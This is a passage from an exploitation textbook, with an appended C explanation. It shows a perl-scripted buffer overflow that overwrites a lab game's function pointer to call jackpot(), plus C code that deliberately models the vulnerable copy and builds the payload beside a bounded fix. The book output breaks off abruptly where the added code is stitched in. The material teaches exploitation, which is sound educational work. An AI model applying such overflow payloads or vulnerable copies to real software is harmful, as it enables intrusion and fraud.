Hacking - The Art of Exploitation, 2nd Edition

Exploitation 161

input. These selections will be made as if they were typed. The following example will choose menu item 1, try to guess the number 7, select n when asked to play again, and finally select menu item 7 to quit.


reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde


####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!


10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win.


You now have 50 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
Thanks for playing! Bye.
reader@hacking:~/booksrc $


This same technique can be used to script everything needed for the exploit. The following line will play the Pick a Number game once, then change the username to 100 A’s followed by the address of the jackpot() function. This will overflow the current_game function pointer, so when the Pick a Number game is played again, the jackpot() function is called directly.


reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n". "A"x100. "\x70\x8d\x04\x08\n". "1\nn\n". "7\n"'
1
5
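To make the overwrite concrete, here is an added example in C; it is not the book's game_of_chance.c. It models the user record as a struct whose 100-byte name buffer is immediately followed by the current_game function pointer (that layout, and every identifier in the block, is an assumption made for this example), builds the same filler-plus-address payload that the perl one-liner prints, and contrasts the unbounded copy with a bounded one. The address is taken from the running program rather than hard-coded as 0x08048d70, so the example also runs on 64-bit systems where a pointer is eight bytes rather than four.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed layout for this example: a fixed-size name buffer directly followed
 * by the function pointer that the menu dispatches through. */
struct user {
    int uid;
    int credits;
    int highscore;
    char name[100];             /* matches the "A"x100 filler in the one-liner */
    int (*current_game)(void);
};

/* Two possible targets of current_game; both are stand-ins for the book's games. */
static int pick_a_number(void) { return 0; }   /* no payout in this model */
static int jackpot(void)       { return 100; } /* the function the attacker wants called */

/* Vulnerable: copies every byte of the supplied name, however long.
 * The write goes through the struct's own storage so the model stays
 * well-defined C while still clobbering whatever follows name[]. */
static void set_name_vulnerable(struct user *u, const unsigned char *name, size_t len) {
    memcpy((unsigned char *)u + offsetof(struct user, name), name, len);
}

/* Hardened: never write past name[], and always NUL-terminate. */
static void set_name_safe(struct user *u, const unsigned char *name, size_t len) {
    size_t max = sizeof u->name - 1;
    if (len > max)
        len = max;
    memcpy(u->name, name, len);
    u->name[len] = '\0';
}

/* Number of filler bytes needed before the function pointer (100 here). */
size_t filler_length(void) {
    return offsetof(struct user, current_game) - offsetof(struct user, name);
}

/* Build the payload the perl one-liner prints: filler up to current_game,
 * then the target's address in native width and byte order. On the book's
 * 32-bit x86 that is 100 'A's plus the 4 bytes "\x70\x8d\x04\x08". */
size_t build_payload(unsigned char *out, size_t outlen, int (*target)(void)) {
    size_t filler = filler_length();
    size_t total = filler + sizeof target;
    if (total > outlen)
        return 0;
    memset(out, 'A', filler);
    memcpy(out + filler, &target, sizeof target);
    return total;
}

/* Set the name with the chosen routine, then "play": dispatch through
 * current_game exactly as the menu would. Returns the credits won. */
int credits_won(int use_vulnerable_copy) {
    struct user u = { 1, 50, 0, "Jon Erickson", pick_a_number };
    unsigned char payload[256];
    size_t n = build_payload(payload, sizeof payload, jackpot);
    if (n == 0)
        return -1;
    if (use_vulnerable_copy)
        set_name_vulnerable(&u, payload, n);
    else
        set_name_safe(&u, payload, n);
    return u.current_game();
}

int main(void) {
    printf("filler bytes before current_game: %zu\n", filler_length());
    printf("unbounded copy, credits won: %d\n", credits_won(1));
    printf("bounded copy,   credits won: %d\n", credits_won(0));
    return 0;
}
```

Compile with cc and run: the unbounded copy reports 100 credits because jackpot() was reached through the overwritten pointer, while the bounded copy reports 0 because current_game still points at pick_a_number(). The fix is the same one that would close the hole in the real program: the name routine must stop at sizeof(name) - 1, whatever the input length, so no input can reach the pointer that sits behind the buffer.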